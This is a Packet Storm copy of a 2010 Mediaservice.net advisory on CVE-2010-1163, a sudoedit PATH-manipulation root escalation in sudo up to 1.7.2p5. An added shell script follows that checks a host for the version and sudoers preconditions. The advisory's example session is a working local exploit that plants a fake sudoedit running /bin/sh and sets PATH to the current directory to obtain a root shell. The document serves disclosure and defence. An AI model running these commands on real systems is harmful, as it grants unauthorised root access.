packetstorm | Maurizio Agazzini | PACKETSTORM:88672
History: Apr 20, 2010 - 12:00 a.m.

Sudo 1.7.2p5 Local Privilege Escalation


EPSS: 0.0004 (Low), percentile 8.6%

`Security Advisory @ Mediaservice.net Srl  
(#02, 19/04/2010) Data Security Division  
  
Title: sudoedit local privilege escalation through PATH manipulation  
Application: sudo <= 1.7.2p5  
Platform: Linux, maybe others  
Description: A local user with permission to run the sudoedit pseudo-command   
can gain root privileges, through manipulation of the PATH   
environment variable.  
Authors: Valerio Costamagna <[email protected]>  
Maurizio Agazzini <[email protected]>  
Vendor Status: sudo team notified on 26/03/2010  
CVE Candidate: The Common Vulnerabilities and Exposures project has assigned  
the name CVE-2010-1163 to this issue.  
References: http://lab.mediaservice.net/advisory/2010-02-sudo.txt  
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1163  
http://www.sudo.ws/sudo/alerts/sudoedit_escalate2.html  
  
1. Abstract.  
  
While writing an article about the vulnerability outlined in CVE-2010-0426, we  
found a distinct security flaw, also related to the sudoedit pseudo-command.  
Specifically, the path component of sudoedit is not checked correctly. This   
can be easily exploited by a local user with permission to run sudoedit, in   
order to execute arbitrary commands as root.  
  
2. Example Attack Session.  
  
inode@pandora:~$ echo "/bin/sh" > sudoedit  
inode@pandora:~$ /usr/bin/chmod +x sudoedit  
inode@pandora:~$ id  
uid=1000(inode) gid=100(users) groups=100(users)  
inode@pandora:~$ export PATH=.  
inode@pandora:~$ /usr/bin/sudo sudoedit /etc/hosts  
Password:  
sh-3.1# /usr/bin/id  
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),  
10(wheel),11(floppy),17(audio),18(video),19(cdrom),26(tape),83(plugdev),84(power),  
86(netdev),93(scanner)  
sh-3.1#  
  
3. Affected Platforms.  
  
All vendors supporting sudo <= 1.7.2p5 are affected. Exploitation of this  
vulnerability requires that the /etc/sudoers file be configured to allow the  
attacker to run sudoedit.  
  
4. Fix.  
  
On April 9th 2010, version 1.7.2p6 was released by the sudo team, which  
fixes the described vulnerability.  
  
5. Proof Of Concept.  
  
See Example Attack Session above.  
  
Copyright (c) 2010 @ Mediaservice.net Srl. All rights reserved.  
`
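
The following shell check is an added example, not part of the Mediaservice.net advisory or of sudo: it tests the two preconditions from sections 3 and 4, a sudo version older than 1.7.2p6 and a sudoers rule that grants sudoedit. The function names and the sample sudoers content are constructed for illustration.

```shell
#!/bin/sh
# Added example: check a host for the two preconditions the advisory names.
# Function names and the sample sudoers text are constructed for illustration.
# A version string is a heuristic: distributions may backport the fix.

FIXED_KEY=1007002006   # key for 1.7.2p6, the fixed release per the advisory

# Map "1.7.2p5" to a sortable integer (major, minor, patch, p-level).
# Returns 1 and prints nothing if the string is not a sudo-style version.
version_key() {
    fields=$(printf '%s\n' "$1" | sed -n \
's/^\([0-9]\{1,3\}\)\.\([0-9]\{1,3\}\)\.\([0-9]\{1,3\}\)\(p\([0-9]\{1,3\}\)\)\{0,1\}.*$/\1 \2 \3 \5/p')
    [ -n "$fields" ] || return 1
    set -- $fields
    echo $(( (($1 * 1000 + $2) * 1000 + $3) * 1000 + ${4:-0} ))
}

# 0 = affected (older than 1.7.2p6), 1 = not affected, 2 = unparsable.
sudo_version_affected() {
    key=$(version_key "$1") || return 2
    [ "$key" -lt "$FIXED_KEY" ]
}

# Print non-comment sudoers lines that name the sudoedit pseudo-command.
# Users granted ALL can run sudoedit too, but are already root-equivalent.
sudoedit_rules() {
    grep -v '^[[:space:]]*#' "$1" |
        grep -E '(^|[^[:alnum:]_])sudoedit([^[:alnum:]_]|$)' || true
}

# 0 when both preconditions hold: affected version and a sudoedit rule.
host_exposed() {
    sudo_version_affected "$1" && [ -n "$(sudoedit_rules "$2")" ]
}

# Constructed sample sudoers file (not taken from the advisory).
SAMPLE=$(mktemp)
trap 'rm -f "$SAMPLE"' EXIT
cat > "$SAMPLE" <<'EOF'
Defaults env_reset
# alice ALL = sudoedit /etc/motd
webadmin ALL = (root) sudoedit /etc/hosts
backup ALL = NOPASSWD: /usr/bin/rsync
EOF

for v in 1.6.9p17 1.7.2p5 1.7.2p6 1.8.31; do
    if host_exposed "$v" "$SAMPLE"; then echo "$v: exposed"
    else echo "$v: not exposed"; fi
done
# Real host (as root): host_exposed "$(sudo -V | sed -n '1s/^Sudo version //p')" /etc/sudoers
```

Files pulled in through sudoers include directives need the same scan; pass each one to `sudoedit_rules` in turn.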